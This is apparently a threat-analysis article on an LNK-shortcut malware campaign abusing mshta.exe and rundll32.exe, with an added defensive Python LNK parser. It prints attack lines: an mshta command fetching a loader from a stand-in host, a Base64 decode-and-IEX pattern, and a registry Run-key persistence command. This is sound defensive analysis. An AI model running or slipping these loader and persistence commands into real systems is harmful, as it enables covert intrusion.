A recent wave of attacks leveraging malicious Windows shortcut files (.LNK) has put security teams on high alert.
Emerging in late August 2025, this LNK malware distribution campaign abuses trusted Microsoft binaries to bypass endpoint protections and execute payloads without raising suspicion.
Delivered primarily via spear-phishing emails and compromised websites, the shortcut files appear innocuous, embedding commands that invoke legitimate Windows utilities to fetch and launch additional malware components.
Early victims have reported subtle indicators of compromise, such as anomalous PowerShell calls and unexpected network connections, often dismissed as benign system activity.
Researchers observed that the campaign targets both enterprise and consumer endpoints, focusing on users with elevated privileges.
The initial lure emails mimic internal IT notifications or security alerts, encouraging recipients to click on a seemingly harmless shortcut attachment.
Upon execution, the LNK file causes Windows Explorer to launch a hidden payload through built-in binaries such as mshta.exe and rundll32.exe, which stage the rest of the attack.
This technique enables the threat actor to evade antivirus signatures and behavioral detection rules that typically flag direct execution of unknown executables.
K7 Security Labs analysts noted that the attackers crafted the LNK payload to pass encoded parameters to these native utilities, hindering straightforward analysis in sandbox environments.
By chaining multiple benign processes, the malware achieves “living off the land” execution, reducing its forensic footprint on disk and in memory.
Victims’ endpoint logs show rapid process spawning events, where each process hands off execution to the next stage in under a second, complicating detection efforts.
Infection Mechanism and Payload Deployment
Diving deeper into the infection mechanism, the malicious .LNK file's target and argument fields point mshta.exe at a remote HTML Application (HTA) script hosted on a compromised server. When a user double-clicks the shortcut, Explorer invokes mshta.exe with the following command line (URL defanged):
mshta.exe "http[:]//malicious-domain.com/loader.hta"
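The shortcut traits described above can be checked offline by reading the .LNK structure directly. The following is an added example, not code from the original article or from K7 Security Labs: it parses the ShellLinkHeader and StringData fields defined in MS-SHLLINK, then flags a trusted-binary target combined with a remote URL in the arguments. The sample shortcut is constructed in the script from the mshta.exe command line quoted above; the relative path and the list of trusted binaries beyond mshta.exe and rundll32.exe are assumptions for illustration.

```python
"""Added example, not code from the original article or from K7 Security Labs:
parse a Windows shortcut per MS-SHLLINK and flag the traits described above
(trusted-binary target, remote URL in the arguments). The sample .LNK is
constructed in-script from the article's mshta.exe command line."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that opens the target minimised

# StringData fields follow LinkInfo in this fixed order (MS-SHLLINK section 2.4)
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]

# Trusted Windows binaries named in the article plus the usual script hosts (assumed list)
LOLBINS = {"mshta.exe", "rundll32.exe", "powershell.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "regsvr32.exe", "certutil.exe"}
URL_RE = re.compile(r"(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand, LinkFlags and the StringData strings of a .LNK."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("missing ShellLinkHeader magic")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    (show_command,) = struct.unpack_from("<I", data, 0x3C)
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the shell item ID list
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip the volume/local-path LinkInfo block
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return info


def triage(info: dict) -> list:
    """Reasons the shortcut matches the LNK-loader pattern; empty means unremarkable."""
    target = (info.get("relative_path") or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    findings = []
    if target in LOLBINS:
        findings.append(f"target is the trusted Windows binary {target}")
    if URL_RE.search(args):
        findings.append("arguments contain a remote URL")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimised, hiding the launched utility")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Construct a minimal Unicode .LNK (no IDList or LinkInfo) for offline testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20)  # 0x20 = FILE_ATTRIBUTE_ARCHIVE
    header += b"\x00" * 24  # CreationTime, AccessTime, WriteTime left unset
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)  # FileSize .. Reserved3

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample mirroring the command line quoted in the article (not a real capture)
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                       "http://malicious-domain.com/loader.hta")

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["relative_path"], parsed["arguments"])
    for reason in triage(parsed):
        print(" -", reason)
```

The parser reads only the StringData fields, so a shortcut that carries its target solely in the LinkTargetIDList will show no relative_path; in that case the IDList items need to be decoded before the target can be judged. Quarantined attachments from mail gateways are the natural input to run this over.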
The obfuscated loader script then runs Base64-encoded PowerShell to retrieve the next-stage payload. The published snippet is a minimal stand-in for that decode-and-execute pattern:
# 'aGVsbG8gd29ybGQ=' is Base64 for the text "hello world"; a real loader carries an encoded download cradle here
$payload = 'aGVsbG8gd29ybGQ='
# Decode the string and run it in memory with Invoke-Expression (IEX); nothing is written to disk
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))
The snippet decodes and executes the string from memory, showing how the attacker avoids writing the next stage to disk.
Once the HTA executes, it uses rundll32.exe to load a malicious DLL directly into a suspended svchost.exe process, bypassing scanners that only inspect executable files. The DLL then establishes persistence by creating a registry Run key, as in the following PowerShell command:
# Set-ItemProperty assumed; the published fragment showed only the -Name and -Value parameters
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'rundll32.exe C:\Windows\Temp\updater.dll,EntryPoint'
By abusing registry-based persistence and trusted Windows binaries, the malware ensures that it launches automatically upon user login, even if endpoint detections attempt to quarantine the DLL file.
Indicators of compromise include network requests to suspicious domains, anomalous mshta.exe and rundll32.exe process trees, and unrecognized entries under the CurrentVersion\Run key.